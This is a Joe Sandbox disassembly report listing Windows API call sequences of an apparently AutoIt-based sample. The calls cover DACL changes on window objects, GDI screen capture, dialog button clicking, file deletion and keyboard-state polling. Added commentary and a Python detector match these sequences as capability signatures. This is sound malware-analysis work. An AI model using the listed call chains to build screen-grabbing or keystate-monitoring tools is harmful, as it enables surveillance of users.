                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B3B679
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B3B695
                          • GetLengthSid.ADVAPI32(?), ref: 00B3B6B2
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B3B6C1
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B3B6C8
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B3B6E9
                          • CopySid.ADVAPI32(00000000), ref: 00B3B6F0
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B3B721
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B3B747
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B3B75B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          • Opcode ID: 7cc9989f50cdaa401a0519194237394089faa597a01c5bf7a9cc68b25ba81870
                          • Instruction ID: 88be1f8ef24a968db893b9fa5bb7aa0133b3f4238d73aabac3d781591587abcc
                          • Opcode Fuzzy Hash: 7cc9989f50cdaa401a0519194237394089faa597a01c5bf7a9cc68b25ba81870
                          • Instruction Fuzzy Hash: 6D514C75900209FFDF009FA4DC45EEEBBB9FF44304F14819AEA15AB2A4DB319A05CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetDC.USER32(00000000), ref: 00B5A2DD
                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B5A2E9
                          • CreateCompatibleDC.GDI32(?), ref: 00B5A2F5
                          • SelectObject.GDI32(00000000,?), ref: 00B5A302
                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B5A356
                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00B5A392
                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B5A3B6
                          • SelectObject.GDI32(00000006,?), ref: 00B5A3BE
                          • DeleteObject.GDI32(?), ref: 00B5A3C7
                          • DeleteDC.GDI32(00000006), ref: 00B5A3CE
                          • ReleaseDC.USER32(00000000,?), ref: 00B5A3D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: 0dbe643b050fc7482d9831dcb841f557d06435b8c483a525a2043ff014dc9814
                          • Instruction ID: 23ca11eae6f1a6b999f14218edd8bc0a416e3b91e3bb56180d3b37e522c84288
                          • Opcode Fuzzy Hash: 0dbe643b050fc7482d9831dcb841f557d06435b8c483a525a2043ff014dc9814
                          • Instruction Fuzzy Hash: 47515971900309AFCB10DFA8DC89EAEBBF9EF48310F14855EF94AA7260C731A845CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00B6E564
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00B6E57B
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00B6E586
                          • CloseHandle.KERNEL32(00000000), ref: 00B6E593
                          • GlobalFix.KERNEL32(00000000), ref: 00B6E59C
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B6E5AB
                          • GlobalUnWire.KERNEL32(00000000), ref: 00B6E5B4
                          • CloseHandle.KERNEL32(00000000), ref: 00B6E5BB
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B8D9BC,?), ref: 00B6E5E5
                          • GlobalFree.KERNEL32(00000000), ref: 00B6E5F5
                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00B6E619
                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00B6E644
                          • DeleteObject.GDI32(00000000), ref: 00B6E66C
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B6E682
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Global$File$CloseHandleObject$AllocCopyCreateDeleteFreeImageLoadMessagePictureReadSendSizeWire
                          • String ID:
                          • API String ID: 237262595-0
                          • Opcode ID: 125d99e9d37e4ba4af9dda550f65fd2933cab0210ad809700973c6e8c3307471
                          • Instruction ID: 5da869eda780475ebf69636cf56befebef447082d41f044e8a9286b236e412bb
                          • Opcode Fuzzy Hash: 125d99e9d37e4ba4af9dda550f65fd2933cab0210ad809700973c6e8c3307471
                          • Instruction Fuzzy Hash: 57413A75600208EFDB11AF65DC88EAA7BB9EF89725F108059F916E72A0DB35DD01DB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 00B4D567
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B4D589
                          • __swprintf.LIBCMT ref: 00B4D5DC
                          • _wprintf.LIBCMT ref: 00B4D68D
                          • _wprintf.LIBCMT ref: 00B4D6AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2116804098-2391861430
                          • Opcode ID: 3a1c0ef564d2eebc06eb39de8c915984012943073996025cdd79a3bb94431510
                          • Instruction ID: b32a7aee7b8df1a8b03e254d2fcea2627fb09a469acdeb8148fd91dd6cec59e6
                          • Opcode Fuzzy Hash: 3a1c0ef564d2eebc06eb39de8c915984012943073996025cdd79a3bb94431510
                          • Instruction Fuzzy Hash: AA515E71900109BADB15EBA0DD46EEEBBF9EF14700F1045A5F106B20A2EF716F58DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00B4D37F
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B4D3A0
                          • __swprintf.LIBCMT ref: 00B4D3F3
                          • _wprintf.LIBCMT ref: 00B4D499
                          • _wprintf.LIBCMT ref: 00B4D4B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2116804098-3420473620
                          • Opcode ID: 60c6ad05d10d7e66a7e226f8c390a8e2925120a34003403c3212761150e60a40
                          • Instruction ID: c6a8d65e947146ad942938e64ccef25607fc2a77a370c6d5ea5af25aef4e12ac
                          • Opcode Fuzzy Hash: 60c6ad05d10d7e66a7e226f8c390a8e2925120a34003403c3212761150e60a40
                          • Instruction Fuzzy Hash: 68518171900109BBDB15EBA0DD46EEEBBF9EF14700F1044E6B106B21A2EB716F58DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          • API String ID: 3964851224-909552448
                          • Opcode ID: bcf810627e97e0d8f8a30ec9ba1999f0715138a8b91aa5fa1a4dbe962186f2a2
                          • Instruction ID: c68614a407728ecfa0a1791940592dbd15d391870433bca1955b0fd61264a936
                          • Opcode Fuzzy Hash: bcf810627e97e0d8f8a30ec9ba1999f0715138a8b91aa5fa1a4dbe962186f2a2
                          • Instruction Fuzzy Hash: 9F41673511034A8BDF14EF04D880AFA33E1FF66750F6408E4FC625B29ADB749A5ACB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B4843F
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B48455
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B48466
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B48478
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B48489
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: SendString$_memmove
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 2279737902-1007645807
                          • Opcode ID: 174146fbdbe8fa92161c88ab058d99020cdbcfcab6885bddc0540390f6112bce
                          • Instruction ID: 6068b617f087931e80673f0a44c1c4a01992f7b16cc3fd23f7f4b0ac7c090110
                          • Opcode Fuzzy Hash: 174146fbdbe8fa92161c88ab058d99020cdbcfcab6885bddc0540390f6112bce
                          • Instruction Fuzzy Hash: 1D1182A5A401597AD720A7A1DC4ADFF7EFCEB91F00F4408A97411A21E1DEB05E44C6B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • timeGetTime.WINMM ref: 00B4809C
                            • Part of subcall function 00B1E3A5: timeGetTime.WINMM(?,75C0B400,00B76163), ref: 00B1E3A9
                          • Sleep.KERNEL32(0000000A), ref: 00B480C8
                          • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00B480EC
                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00B4810E
                          • SetActiveWindow.USER32 ref: 00B4812D
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B4813B
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B4815A
                          • Sleep.KERNEL32(000000FA), ref: 00B48165
                          • IsWindow.USER32 ref: 00B48171
                          • EndDialog.USER32(00000000), ref: 00B48182
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: 756ebfe12e161b0a0edcfa4fdbf50a90f881c748b7e8196b89178a1573280ae2
                          • Instruction ID: 7bfe56b1914d2baa83df6995bc683d95d95227dbe182b25518b22f4328ef46ee
                          • Opcode Fuzzy Hash: 756ebfe12e161b0a0edcfa4fdbf50a90f881c748b7e8196b89178a1573280ae2
                          • Instruction Fuzzy Hash: A521AE70200204BFE7266B61EC89E6A7BEAFB19B89B444156F511933B1DF728F05EB11
                          Uniqueness

                          Uniqueness Score: -1.00%
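
Three of the call listings above read as capability signatures rather than as isolated API hits: the routine at 00B3B5F7..00B3B75B rewrites the DACL of a user object (GetUserObjectSecurity and SetUserObjectSecurity operate on window stations and desktops) by reading the existing ACL, appending ACEs and writing the descriptor back; the routine at 00B5A2DD..00B5A3D9 is the standard GDI screen grab (screen DC copied into a compatible bitmap, pixels read out with GetDIBits); and the routine at 00B4809C..00B48182 finds a dialog's BUTTON control, sends it BM_CLICK (0x00F5) and ends the dialog. The Python below is an added example, not Joe Sandbox's code and not the sample's: it parses lines in this report's "APIs" format and flags a function when a signature's API names occur as an ordered subsequence of that function's calls. The signature names and the subsequence heuristic are the example's own choices; the two sample listings are copied from this page, and on a full report each function entry should be fed separately.

```python
import re
from typing import Dict, List, Tuple

# One "APIs" line of a Joe Sandbox function listing, e.g.
#   • GetDC.USER32(00000000), ref: 00B5A2DD
#   • Part of subcall function 00B3B8E7: GetLastError.KERNEL32(...), ref: 00B3B90D
# Only the API name and module are captured; arguments and the ref address are ignored.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
)

# Capability signatures (this example's own naming): API names that must occur
# in this relative order within one function's call list. Each list is taken
# from a listing on this page.
SIGNATURES: Dict[str, List[str]] = {
    # GDI screen grab: screen DC -> compatible bitmap -> read pixels.
    "screen_capture_gdi": [
        "GetDC", "CreateCompatibleBitmap", "CreateCompatibleDC", "SelectObject",
        "StretchBlt", "GetDIBits", "ReleaseDC",
    ],
    # Rewrite the DACL of a window station/desktop object.
    "user_object_dacl_modification": [
        "GetSecurityDescriptorDacl", "GetAce", "AddAce",
        "SetSecurityDescriptorDacl", "SetUserObjectSecurity",
    ],
    # Drive a dialog: locate its BUTTON, send a message to it, end the dialog.
    "dialog_automation": [
        "EnumThreadWindows", "FindWindowExW", "SendMessageW", "EndDialog",
    ],
}


def parse_api_lines(listing: str, include_subcalls: bool = False) -> List[Tuple[str, str]]:
    """Return (api, MODULE) pairs in listing order; subcall lines are skipped by default."""
    calls: List[Tuple[str, str]] = []
    for line in listing.splitlines():
        m = API_LINE.match(line)
        if not m or (m.group("sub") and not include_subcalls):
            continue
        calls.append((m.group("api"), m.group("module").upper()))
    return calls


def is_subsequence(needle: List[str], haystack: List[str]) -> bool:
    """True if every element of needle appears in haystack in the same relative order."""
    it = iter(haystack)  # shared iterator: each wanted name consumes haystack up to its match
    return all(any(seen == want for seen in it) for want in needle)


def match_capabilities(calls: List[Tuple[str, str]]) -> List[str]:
    """Names of every signature whose API sequence is embedded in the call list."""
    names = [api for api, _ in calls]
    return [cap for cap, seq in SIGNATURES.items() if is_subsequence(seq, names)]


# Sample listings copied from this report (routines at 00B5A2DD.. and 00B3B5F7..).
SCREEN_CAPTURE_LISTING = """
• GetDC.USER32(00000000), ref: 00B5A2DD
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B5A2E9
• CreateCompatibleDC.GDI32(?), ref: 00B5A2F5
• SelectObject.GDI32(00000000,?), ref: 00B5A302
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B5A356
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00B5A392
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B5A3B6
• SelectObject.GDI32(00000006,?), ref: 00B5A3BE
• DeleteObject.GDI32(?), ref: 00B5A3C7
• DeleteDC.GDI32(00000006), ref: 00B5A3CE
• ReleaseDC.USER32(00000000,?), ref: 00B5A3D9
"""

DACL_LISTING = """
  • Part of subcall function 00B3B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B3B903
  • Part of subcall function 00B3B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B3B3E1,?), ref: 00B3B9A6
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B3B5F7
• _memset.LIBCMT ref: 00B3B60C
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B3B62B
• GetLengthSid.ADVAPI32(?), ref: 00B3B63C
• GetAce.ADVAPI32(?,00000000,?), ref: 00B3B679
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B3B695
• CopySid.ADVAPI32(00000000), ref: 00B3B6F0
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B3B721
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B3B747
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B3B75B
"""

if __name__ == "__main__":
    for label, listing in (("screen capture", SCREEN_CAPTURE_LISTING), ("DACL", DACL_LISTING)):
        print(label, "->", match_capabilities(parse_api_lines(listing)))
```

Ordered-subsequence matching is deliberately loose: it tolerates the extra GetLengthSid and heap calls in the DACL routine and the second GetDIBits in the screen grab, but it still distinguishes a routine that reads a DACL from one that also writes it back. Subcall lines are excluded by default because they belong to a different function and would otherwise let one shared helper light up every caller.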

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B73C64,00000010,00000000,Bad directive syntax error,00B9DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00B432D1
                          • LoadStringW.USER32(00000000,?,00B73C64,00000010), ref: 00B432D8
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • _wprintf.LIBCMT ref: 00B43309
                          • __swprintf.LIBCMT ref: 00B4332B
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B43395
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 1506413516-4153970271
                          • Opcode ID: 3de40961ebc7469d148bb8e822afc83810cd19c00e8cf344941da6ca8ae2fb53
                          • Instruction ID: 48d2c7f98278b8f0fa0bcb600acab7b2fc2f9b4fdbea19979dd0a5c1c8c04d24
                          • Opcode Fuzzy Hash: 3de40961ebc7469d148bb8e822afc83810cd19c00e8cf344941da6ca8ae2fb53
                          • Instruction Fuzzy Hash: D2213D31940219BBDF11EF90CC4AEEE7BF9FF14B00F004496B516A10E1EAB1AB54DB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B4C6A0: __time64.LIBCMT ref: 00B4C6AA
                            • Part of subcall function 00B041A7: _fseek.LIBCMT ref: 00B041BF
                          • __wsplitpath.LIBCMT ref: 00B4C96F
                            • Part of subcall function 00B2297D: __wsplitpath_helper.LIBCMT ref: 00B229BD
                          • _wcscpy.LIBCMT ref: 00B4C982
                          • _wcscat.LIBCMT ref: 00B4C995
                          • __wsplitpath.LIBCMT ref: 00B4C9BA
                          • _wcscat.LIBCMT ref: 00B4C9D0
                          • _wcscat.LIBCMT ref: 00B4C9E3
                            • Part of subcall function 00B4C6E4: _memmove.LIBCMT ref: 00B4C71D
                            • Part of subcall function 00B4C6E4: _memmove.LIBCMT ref: 00B4C72C
                          • _wcscmp.LIBCMT ref: 00B4C92A
                            • Part of subcall function 00B4CE59: _wcscmp.LIBCMT ref: 00B4CF49
                            • Part of subcall function 00B4CE59: _wcscmp.LIBCMT ref: 00B4CF5C
                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B4CB8D
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B4CC24
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B4CC3A
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B4CC4B
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B4CC5D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                          • String ID:
                          • API String ID: 152968663-0
                          • Opcode ID: a418542074cca4a5eccc45b928e46b086a6752ce435efbb09e580e04e13067cc
                          • Instruction ID: ed83bbe57de6a06a10569f2cefc04d092bcfa3805602c6669e31e3e3a0cf0534
                          • Opcode Fuzzy Hash: a418542074cca4a5eccc45b928e46b086a6752ce435efbb09e580e04e13067cc
                          • Instruction Fuzzy Hash: 14C12AB1901129AACF50DF95CC81ADEBBF9EF59710F0040EAB609E6151DB709B849FA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetKeyboardState.USER32(?), ref: 00B43908
                          • SetKeyboardState.USER32(?), ref: 00B43973
                          • GetAsyncKeyState.USER32(000000A0), ref: 00B43993
                          • GetKeyState.USER32(000000A0), ref: 00B439AA
                          • GetAsyncKeyState.USER32(000000A1), ref: 00B439D9
                          • GetKeyState.USER32(000000A1), ref: 00B439EA
                          • GetAsyncKeyState.USER32(00000011), ref: 00B43A16
                          • GetKeyState.USER32(00000011), ref: 00B43A24
                          • GetAsyncKeyState.USER32(00000012), ref: 00B43A4D
                          • GetKeyState.USER32(00000012), ref: 00B43A5B
